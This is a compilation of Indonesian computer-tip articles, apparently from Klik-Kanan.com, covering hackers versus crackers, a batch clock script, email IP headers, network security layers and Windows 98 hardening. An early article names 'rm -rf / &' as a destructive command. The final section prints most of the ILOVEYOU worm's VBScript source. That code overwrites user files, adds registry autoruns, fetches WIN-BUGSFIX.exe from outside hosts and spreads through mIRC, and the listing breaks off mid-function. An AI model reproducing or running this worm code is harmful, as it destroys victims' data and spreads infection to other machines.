Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ’rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.


Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ’rm -rf / &’.


Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.


Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.


Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, ”To boldly go where no one has gone before”.


Penulis: Onno W Purbo



Artikel Belajar Menjadi Hacker ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet.

Tips-Trik CMD

Tips-Trik CMD : Membuat JAMcmd


Hola….., wah.. pasti banyak yang udah kangen (mungkin tidak samasekali) sama saya n gak sabar pengen liat tutorial keren lagi (huh..GR banget mas..). OK, langsung saja kita ke masalahnya, tapi sebelumnya saya pengen cerita dikit tentang munculnya ide gila ini.


Begini ceritanya…………………..waktu itu, di malam gelap gulita aku sedang memanjat pohon semangka yang sangaaat tinggi.. tiba-tiba aku dikagetkan oleh sesuatu yang sangat-sangat mengerikan. Sebuah sosok berambut hitam berkacamata datang menghampiriku dan waw..ternyata seorang wanita cantik. Saat itu aku terkesima ketika dia sedang mandi di sungai dan aku berniat untuk mencuri pakaiannya..tapi begitu saya hendak mengambilnya ada saja yang menggagalkan misi gila itu..emak aku menyiramku dengan segalon air dan akupun terbangun..yach buyar deh Ceritanya..tapi gpp masih ada cerita yang jauh lebih gak nyambung n’ ide yang lebih gila lagi, on next Tut’s tentunya..


Langsung saja kita jangan berlama-lama lagi dengan cerita bodoh diatas, coz bikin kamu tambah bingung n tidak fokus..Kembali ke Judulnya: Membuat JAMcmd, pasti tambah bingung, apaan sich ??.. gw juga gak tau mau jelasin apa tentang jamCMD ini, kita liat aja yuk codenya biar ngerti….





HERE is THE CODE


(tested on Windows XP sp 2)


———————- start ————————-


@echo off


start /b ”%comspec%”


:update


set _time=%time:~0,8%


title Time : [ %_time% ] @ [ %date% ]


ping localhost -n 2 -w 500 >nul


goto update


———————– end ————————–


Lah, segitu aja, panjang ceritanya daripada codenya..dasar ide gila


Save dengan extensi .bat


Contoh : JamCMD.bat


Copykan ke directory windows (c:\windows) supaya bisa dipanggil lewat menu RUN


START –> RUN, truz tinggal ketik jamcmd…


Oiya..kalau mau decompile jadi .exe juga bisa pake QuickBatchFileCompiler donlot di


Link : http://www.abyssmedia.com/quickbfc


Sekarang ke bab penjelasan..



a).Tampilan (sekerin sot)


Membuat JAMcmd


Hmmm..


Tapi perasan gak ada yang bedanya dengan cmd biasa..


..eits tunggu dulu, coba perhatikan lagi windowtitlenya bertuliskan “Time : [7:01:53] @ [ 30 Jul 07 ]”


Nah itu dia bedanya, windowtitlenya ada jam dan tanggalnya yang selalu terupdate..


b). Penjelasan Code


1. echo off – digunakan agar perintah tidak menampilkan pesan setelah dijalankan (berlaku untuk perintah setelah/dibawah echo off).


2. Start – untuk menjalankan suatu program (%comspec% adalah cmd, jadi kita menjalankan cmd).


3. @ - sama dengan echo off tapi hanya untuk perintah dibelakangnya.


4. :update – memberi label update pada script untuk looping.


5. Set – untuk menampilkan, mengeset, atau menghapus nilai dari suatu variable (pada kali ini kita menggunakan variable “_time”).


6. Title – untuk mengganti windowtitle CommandPrompt.


7. Ping – sebenarnya untuk koneksi internet, tapi kita akali agar menggantikan pause selama 1 detik (di cmd tidak ada perintah untuk melakukan pause).


8. Goto – untuk melakukan looping/perulangan/kembali ke label “update”


Segitu aja yah penjelasannya, kalau ada yang belum jelas tanyaiin aja ke forum PemrogramanLain..oks


Sbg Penutup gw pengen ngasih pantun buat yang lagi putus cinta…LL..


—————————————————————————-


Jalan jalan ke kota batu..

Makan apel rasanya manis..

Jangan sedih diputus cewe satu..

Masih banyak kok cewe yang lebih manis..


—————————————————————————-


Salam/Regard


Fen_Li


‘still newbie kid’



Artikel Tips-Trik CMD : Membuat JAMcmd ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet.

Mengetahui IP Address Pengirim Email

Mengetahui IP Address Pengirim Email



Saat Anda membaca email mungkin hanya terlihat informasi date, to, cc, bcc, subject dan message. Padahal setiap email yang terkirim pasti menyertakan informasi yang lengkap seperti message id, mailer, ip address, dan sebagainya.


Kalau Anda ingin mengetahui ip address pengirim email beserta isp yang digunakan Anda bisa membaca tips berikut ini.



Yahoo Mail:



  1. Login ke Yahoo Mail.

  2. Pilih salah satu email yang ingin Anda cek.

  3. Klik pada menu atau link Full Header yang terletak di kanan bawah.

  4. Cari tulisan ”Received: from [...] by”.

  5. Pada contoh di bawah ini IP addressnya adalah 61.94.152.147.


MS Outlook Express:



  1. Buka program Outlook Express.

  2. Klik kanan pada salah satu email yang ingin Anda cek.

  3. Klik menu Properties.

  4. Klik tab Detail.


Kalau Anda sudah mendapatkan informasi ip address selanjutnya Anda bisa mengecek ISP yang digunakan beserta kotanya. Anda bisa membaca infonya di sini.



Artikel Mengetahui IP Address Pengirim Email ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet.

Network Security: Apa dan Bagaimana?
Seperti yang kita lihat di saat ini, Internet telah tumbuh dan berkembang hingga mencapai angka beberapa juta unit komputer yang terkoneksi di berbagai belahan dunia. Dari hari ke hari pula informasi yang terkandung di dalam jaringan Internet tersebut semakin lengkap, akurat, dan penting. . Informasi telah menjadi suatu asset yang sedemikian berharga sehingga perlu mendapat perlakuan yang lebih spesifik. Selain itu pula, kemajuan yang dicapai dalam bidang pengembangan sistem operasi komputer sendiri dan utulitasnya sudah sedemikian jauh dimana tingkat performansi, keandalan dan fleksibilitas software menjadi kriteria utama dalam proses pengembangan software. Dengan semakin penting dan berharganya informasi tersebut dan ditunjang oleh kemajuan pengembangan software, tentunya menarik minat para pembobol (hacker) dan penyusup (intruder) untuk terus bereksperimen guna menemukan dan mempergunakan setiap kelemahan yang ada dari konfigurasi sistem informasi yang telah ditetapkan

Bertolak dari kenyataan di atas, muncul sebuah konsep yang lebih sering disebut dengan Network Security. Pada awalnya, konsep ini menjelaskan lebih banyak mengenai keterjaminan (security) dari sebuah sistem jaringan komputer yang terhubung ke Internet terhadap ancaman dan gangguan yang ditujukan kepada sistem tersebut. Cakupan konsep tersebut semakin hari semakin luas sehingga pada saat ini tidak hanya membicarakan masalah keterjaminan jaringan komputer saja, tetapi lebih mengarah kepada masalah-masalah keterjaminan sistem jaringan informasi secara global. Beberapa negara Eropa dan Amerika bahkan telah menjadikan Network Security menjadi salah satu titik sentral perhatian pihak-pihak militer masing-masing.

Sebenarnya, masalah Network Security ini timbul dari konektivitas jaringan komputer lokal yang kita miliki dengan wide-area network (seperti Internet). Jadi, selama jaringan lokal komputer kita tidak terhubung kepada wide-area network, masalah Network Security tidak begitu penting. Tetapi hal ini bukan berarti memberikan arti bahwa bergabung dengan wide-area network adalah suatu hal yang ‘menakutkan’ dan penuh bahaya. Network Security hanyalah menjelaskan kemungkinan-kemungkinan yang akan timbul dari konektivitas jaringan komputer lokal kita dengan wide-area network.

Secara umum, terdapat 3 (tiga) kata kunci dalam konsep Network Security ini, yaitu:

* resiko / tingkat bahaya,
* ancaman, dan
* kerapuhan sistem (vulnerability)

Resiko atau tingkat bahaya
Dalam hal ini, resiko berarti berapa besar kemungkinan keberhasilan para penyusup dalam rangka memperoleh akses ke dalam jaringan komputer lokal yang dimiliki melalui konektivitas jaringan lokal ke wide-area network. Secara umum, akses-akses yang diinginkan adalah :

* Read Access : Mampu mengetahui keseluruhan sistem jaringan informasi.
* Write Access : Mampu melakukan proses menulis ataupun menghancurkan data yang terdapat di sistem tersebut.
* Denial of Service : Menutup penggunaan utilitas-utilitas jaringan normal dengan cara menghabiskan jatah CPU, bandwidth maupun memory.

Ancaman
Dalam hal ini, ancaman berarti orang yang berusaha memperoleh akses-akses illegal terhadap jaringan komputer yang dimiliki seolah-olah ia memiliki otoritas terhadap akses ke jaringan komputer.

Kerapuhan System (Vulnerability)
Kerapuhan sistem lebih memiliki arti seberapa jauh proteksi yang bisa diterapkan kepada network yang dimiliki dari seseorang dari luar sistem yang berusaha memperoleh akses illegal terhadap jaringan komputer tersebut dan kemungkinan orang-orang dari dalam sistem memberikan akses kepada dunia luar yang bersifat merusak sistem jaringan.

Untuk menganalisa sebuah sistem jaringan informasi global secara keseluruhan tentang tingkat keandalan dan keamanannya bukanlah suatu hal yang mudah dilaksanakan. Analisa terhadap sebuah sistem jaringan informasi tersebut haruslah mendetil mulai dari tingkat kebijaksanaan hingga tingkat aplikasi praktisnya.

Sebagai permulaan, ada baiknya kita melihat sebuah sistem jaringan yang telah menjadi titik sasaran utama dari usaha-usaha percobaan pembobolan tersebut. Pada umumnya, jaringan komputer di dunia menggunakan sistem operasi Unix sebagai platform. Unix telah menjadi sebuah sistem operasi yang memiliki keandalan tinggi dan tingkat performansi yang baik. Tetapi, pada dasarnya Unix tersusun oleh fungsi-fungsi yang cukup rumit dan kompleks. Akibatnya, Unix juga memiliki beberapa kelemahan seperti bug-bug (ketidaksesuaian algoritma pemrograman) kecil yang kadang kala tidak disadari oleh para pemrogram Unix. Selain itu, utilitas-utilitas yang memanfaatkan Unix sebagai platformnya, seringkali mempunyai bug-bug tersendiri pula. Nah, hal-hal inilah yang sering dieksploitasi oleh para hacker dan intruder di seluruh dunia.

Guna mencegah berhasilnya eksploitasi para hacker dan intruder tersebut, dikembangkan sebuah konsep yang dikenal dengan UNIX Network Security Architecture. Arsitektur ini mencakup 7 lapis tingkat sekuriti pada jaringan. Ketujuh lapis tersebut adalah sebagai berikut :

* Lapis ke-7 : Kebijaksanaan
* Lapis ke-6 : Personil
* Lapis ke-5 : Local Area Network
* Lapis ke-4 : Batas Dalam Jaringan
* Lapis ke-3 : Gateway
* Lapis ke-2 : Paket Filtering
* Lapis ke-1 : Batas Luar Jaringan

Kebijaksanaan
Lapis kebijaksanaan menjadi pelindung terhadap keseluruhan program proteksi dan sekuriti jaringan yang diterapkan. Lapis ini mempunyai fungsi mendefinisikan kebijakan-kebijakan organisasi mulai dari resiko yang paling besar yang mungkin didapat hingga bagaimana mengimplementasikan kebijaksanaan yang diambil terhadap prosedur-prosedur dasar dan peralatan yang digunakan. Lapis ini menjadi salah satu penentu utama keberhasilan program proteksi dan sekuriti sistem.

Personil
Lapis ini mendefinisikan segi manusia dalam sistem jaringan informasi. Personil yang melakukan instalasi, konfigurasi, pengoperasian hingga orang-orang yang mampu menjalankan akses-akses yang tersedia di sistem adalah termasuk dalam lapis ini. Kebijakan yang diambil pada lapis ini pada dasarnya harus mencerminkan tujuan-tujuan yang ingin dicapai dalam program proteksi dan sekuriti ini.

Local Area Network
Lapis selanjutnya mendefinisikan peralatan-peralatan dan data-data yang harus mendapatkan proteksi. Selain itu, lapis ini juga mencakup prosedur-prosedur pengawasan dan kontrol yang sering diterapkan dalam sistem.

Batas Dalam Jaringan Batas
Dalam Jaringan mendefinisikan lapisan sistem yang terkoneksi secara fisik ke daerah “penyangga” yang menjadi pemisah antara sistem jaringan informasi lokal dengan jaringan luar. Batas ini menjadi penting karena titik ini menjadi sasaran utama usaha-usaha eksploitasi untuk memperoleh akses illegal. Ada baiknya daerah penyangga ini dikonsentrasikan pada satu titik sehingga penerapan prosedur pengawasan dan kontrol menjadi lebih mudah. Demikian pula bila datang serangan dari luar sistem, hanya akan terdapat satu titik masuk yang paling utama. Dengan demikian, akan lebih mudah mengisolasi sistem yang dimiliki dari konektivitas ke luar bila terjadi gangguan.

Gateway
Gateway mendefinisikan menjadi pintu utama dari dan ke sistem yang dimiliki. Kebijaksanaan proteksi dan sekuriti sebuah sistem yang terkoneksi dengan wide-area network seharusnya lebih mengarahkan usaha-usaha yang ada untuk mengamankan lapis ini sebaik mungkin. Servis-servis publik ada baiknya diletakkan pada lapis tersebut guna meminimisasi kemungkinan akses yang lebih jauh ke dalam sistem.

Paket Filtering
Lapis ini mendefinisikan platform yang berada di antara network interface lapis 3 (gateway) dengan network interface yang menjadi tempat penerapan metoda Firewall. Lapis tersebut lebih bersifat sebagai program yang menjalankan fungsi pengawasan (monitoring) terhadap paket-paket data yang masuk maupun yang keluar sistem.

Batas Luar Jaringan
Batas Luar Jaringan mendefinisikan titik dimana sistem terhubung dengan wide-area network dan kita tidak memiliki kontrol langsung terhadap titik tersebut.

Seperti yang telah dijabarkan di atas, lapis ke-3 menjadi titik utama dan yang paling rawan dalam network security ini. Implementasi kebijaksanaan yang diambil pada layer ini hanya bisa dilakukan secara software. Terdapat beberapa jenis security software yang bisa digunakan untuk memperkuat usaha proteksi dan sekuriti sistem pada lapis ke-3 ini. Di antaranya adalah :

TCP Wrapper
Program ini menyediakan layanan monitoring dan kontrol terhadap network services. Pada dasarnya, yang dilakukan oleh program ini adalah membuat daftar log mengenai aktivitas-aktivitas hubungan yang terjadi. Program ini dapat diambil secara gratis melalui anonymous FTP via ftp.cert.org yang terletak pada direktori pub/tools/tcp_wrappers/tcp_wrappers.*

Swatch
Program Swatch menggabungkan daftar-daftar log yang telah diciptakan oleh program-program utilitas lain di samping kelebihannya yang mampu dikonfigurasi sehingga pada saat melakukan logging, Swatch bisa melakukan aksi lain berdasar pada prioritas-prioritas tertentu. Swatch tersedia melalui anonymous FTP dari sierra.stanford.edu pada direktori pub/sources.

SOCKS library dan sockd
Program ini menjadi alternatif lain dari implementasi konsep “TCP Wrapper”. Kegunaan utama program ini adalah mengkonsentrasikan semua layanan umum internet pada suatu titik. “sockd” dijalankan oleh “inetd” pada saat permintaan layanan tertentu muncul dan hanya memperbolehkan koneksi dari host-host yang telah terdaftar. Program ini tentu saja juga melakukan aktivitas log yang berkaitan dengan koneksi yang terjadi. Program ini dapat diperoleh melalui anonymous FTP pada host s1.gov pada direktori /pub dengan nama socks.tar.Z.

Penulis: Joko Yuliantoro & Onno W. Purbo
Googling Dengan Google Hacks

Google merupakan mesin pencari yang paling banyak digunakan oleh pengguna internet. Kayaknya tidak ada netter yang tidak pernah menggunakan google. Untuk melakukan pencarian “biasa” Anda tinggal mengetikkan aja kata kunci yang ingin Anda cari. Tapi untuk mendapatkan informasi yang lebih spesifik Anda mungkin perlu menggunakan berbagai parameter pada pencarian. Beberapa contoh parameter pencarian pada Google pernah ditulis di sini.

Kalau Anda ingin cara yang lebih mudah, Anda bisa menggunakan Google Hacks. Google Hacks akan mempermudah Anda dalam melakukan pencarian file musik, ebook, video, dll. Anda tinggal mengetikkan kata kunci yang Anda cari dan memilih jenis filenya. Setelah itu tekan tombol Search. Secara otomatis program akan menampilkan hasil pencarian pada default browser di komputer Anda (kalau di Windows defaultnya adalah Internet Explorer).

Anda bisa mendownload Google Hacks di:

http://googlehacks.googlecode.com/files/GoogleHacksSetup1.6.exe
Cek IP Address via ip-adress.com

IP Address merupakan identitas unik untuk setiap komputer yang terhubung dalam jaringan, baik lokal maupun internet.

Saat Anda melakukan koneksi ke internet maka ISP (Internet Service Provider) yang Anda pakai akan memberi anda IP Address (ip publik) secara otomatis (IP address tersebut berbeda dengan ip address untuk jaringn lokal Anda).

Untuk mengecek IP Address yang diberikan oleh ISP saat Anda melakukan koneksi ke internet, Anda bisa mengunjungi situs:

http://ip-adress.com/

Saat Anda membuka situs tersebut maka secara otomatis akan ditampilkan ip address, negara, kota ISP dan nama ISP yang Anda gunakan, contohnya seperti gambar di atas.
Membedah file MSDOS.SYS
File msdos.sys merupakan file yang digunakan untuk menyimpan setting start-up Windows 95 dan 98. File ini terletak pada root directory drive C atau drive yang digunakan untuk booting. Pada file ini tersimpan informasi antara lain sebagai berikut :

1. BootGUI= [0,1]
Secara default Windows secara otomatis akan booting dengan GUI (Graphical User Interface). Dengan mengganti pilihan BootGUI seorang pemakai dapat memilih apakah akan booting ke Windows atau cukup pada dos prompt. Pilihan 1 berarti Windows booting menggunakan GUI. Sedangkan pilihan 0 berarti Windows melakukan booting hanya sampai dos prompt.

2. BootMenu=[0,1]
Secara default Windows 95 dan 98 tidak menampilkan boot menu kecuali kalau pemakai menekan tombol fungsi F8. Dengan menampilkan boot Menu, pemakai dapat memilih jenis booting yang diinginkan : Normal, Safe Mode, Step by step confirmation, Command Prompt Mode, dan sebagainya. Pilihan 1 berarti pada saat booting, Windows akan menampilkan boot menu.

3. Logo=[0,1]
Secara default Windows akan menampilkan gambar awan pada saat booting. Dengan mendisable pilihan ini seorang pemakai dapat melihat proses DOS boot yang terjadi pada background. Pilihan 1 berarti pada saat booting Windows akan menampilkan gambar awan dengan logo Windows.

4. BootDelay=n (n merupakan bilangan dengan satuan detik)
BootDelay merupakan waktu yang memungkinkan seorang pemakai untuk menekan tombol fungsi pada saat booting. Secara default nilai BootDelay adalah 2 yang berarti bahwa pemakai mempunyai kesempatan selama dua detik untuk menekan tombol fungsi.

5. Network=[0,1]
Pilihan 1 berarti Windows tetap mengaktifkan fasilitas network walaupun windows berjalan pada Safe Mode.

6. BootKeys=[0,1]
Secara default Windows mengenable tombol fungsi pada saat booting yang memungkinkan pemakai untuk mengontrol proses booting. Misalnya menekan F8 untuk menampilkan boot menu. Pilihan 1 berarti pemakai memiliki kesempatan untuk menekan tombol fungsi selama proses booting, sedangkan pilihan 0 berarti pemakai tidak punya kesempatan untuk menekan tombol fungsi.

7. AutoScan=[0,1,2]
Jika Windows shutdown secara tidak normal maka pada saat booting secara otomatis Windows akan melakukan scandisk. Pilihan 0 berarti AutoScan di-disable, 1 berarti Windows akan melakukan konfirmasi kepada Anda apakah akan menjalankan scandisk atau tidak, sedangkan 2 berarti Windows secara otomatis akan melakukan scandisk. Bila Anda memilih 0 pastikan bahwa Anda menjalankan scandisk setelah berada pada Windows.

8. BootSafe=[0,1]
Pilihan 1 berarti Windows Anda selalu booting pada safe mode, sedangkan 0 berarti booting secara normal. Pilihan safe mode hanya cocok digunakan bila Windows Anda sedang mengalami trouble.
Meningkatkan Keamanan PC
Banyak hal menjengkelkan yang bisa terjadi pada komputer kita. Misalnya ada orang yang baik sengaja atau pun tidak sengaja menghapus file-file penting kita. Atau merubah berbagai konfigurasi pada Windows. Selain itu bisa saja orang lain melihat file-file Anda yang bersifat rahasia. Kejadian seperti itu sangat mungkin terjadi bila komputer Anda merupakan komputer "umum". Maksudnya banyak orang lain yang turut memakai, misalnya teman, adik atau saudara. Ingat, seorang pemula (dalam hal komputer) biasanya sangat senang mencoba-coba segala sesuatu pada komputer. Nah, untuk menghindari hal-hal yang tidak kita inginkan yang terjadi pada komputer kita Anda bisa mencoba berbagai langkah berikut ini :

1. Password BIOS
Pertama kali Anda mesti membuat password pada BIOS Anda. Mengapa ? Karena pada BIOS ini terdapat fasilitas untuk meng-enable dan men-disable beberapa sumber daya komputer kita. Walaupun ada cara yang mudah untuk menembus password ini, tapi setidaknya ini akan memperlambat sang penyusup....

2. Pastikan booting hanya dari harddisk.
Pada BIOS Anda, pastikan setting untuk booting hanya dari harddisk. Dengan kata lain disable fasilitas booting dari floopy disk, CD-ROM, atau media lainnya.

3. Men-disable Start-up Menu
Dengan mendisable startup menu ini maka orang lain (termasuk kita) hanya dapat booting melalui Windows (tidak bisa booting pada DOS Prompt). Caranya, pada file config.sys tambahkan : SWITCHES=/F/N to CONFIG.SYS. Pada bagian paling atas dari file autoexec.bat tambahkan :
@CTTY NUL
@BREAK OFF
@ECHO OFF
Sedang pada bagian paling akhir dari file autoexec.bat tambahkan : CTTY CON

4. Men-disable Boot Key
Maksudnya adalah mencegah penekanan tombol F8 dan F5 selama booting. Dengan menekan F8 maka akan muncul start-up menu. Cara mendisablenya : Bukalah file msdos.sys yang terletak pada direktori utama (C:\) dengan Notepad. Lalu gantilah Bootkeys=1 menjadi Bootkeys=0.

5. Menyembunyikan icon pada Control Panel
Pada Control Panel terdapat berbagai fasilitas untuk melakukan setting/konfigurasi pada komputer kita. Misalnya setting tentang password, printer, desktop themes, dll. Nah bila Anda tidak ingin ada orang lain yang ingin mengganti setting komputer Anda, Anda bisa melakukan aksi berikut, yakni menyembunyikan berbagai icon pada Control Panel. Caranya, pertama buka file control.ini yang terdapat pada folder c:\windows\control.ini (bila folder windows Anda bernama lain, silahkan disesuaikan). Lalu di bawah bagian [don't load] silahkan masukkan fasilitas yang tidak ingin Anda tampilkan. Misalnya untuk menyembunyikan icon password silahkan tulis "password.cpl=no". Untuk menyembunyikan icon Desktop Setting, tulis "desk.ini=no", dan seterusnya. Untuk melihat daftar file *.cpl bisa Anda lihat di c:\windows\system.

6. Proteksi dengan Software
Proteksi dengan software bisa bermacam-macam bentuknya. Pertama enkripsi. Dengan melakukan enkripsi (penyandian) orang lain akan kesulitan untuk membuka file yang di-enkripsi. Pada waktu melakukan enkripsi kita diharuskan untuk memasukkan password, yang mana password tersebut juga akan digunakan untuk melakukan dekripsi. Dengan begitu orang yang tidak tahu passwordnya tidak akan bisa membuka file tersebut dan tidak akan tahu isinya. Contoh software yang digunakan untuk melakukan enkripsi adalah Cryptext, PGP, dll. Selain dengan enkripsi ada cara lain untuk mengamankan file-file kita, yaitu dengan menggunakan software Win-Secure It dan Folder Guard. Dengan software tersebut kita bisa menyembunyikan file/folder, mencegah eksekusi program, mencegah penghapusan (delete), dll. File yang sudah disembunyikan (hidden) tidak akan terlihat pada Windows Explorer walaupun option Show All File diaktifkan. Mencegah orang lain mengeksekusi/menjalankan program menjadi sangat penting jika Anda mempunyai software untuk melakukan konfigurasi pada Windows, seperti WinBoost, Tweak UI, Start Menu Changer, dan sebagainya.

7. Bila Anda termasuk paranoid
Dengan enam langkah di atas komputer Anda sudah mempunyai tingkat keamanan yang lumayan (tentunya bukan lumayan bagi seorang hacker). Namun bila Anda termasuk paranoid atau betul-betul takut komputer Anda diisengin orang lain Anda bisa meneruskan langkah berikutnya. Yaitu hapus atau rename-lah file-file yang termasuk kategori "berbahaya" bila dijalankan, seperti fdisk.exe, format.exe, dll.
Source Code Virus
Virus I Love You


rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
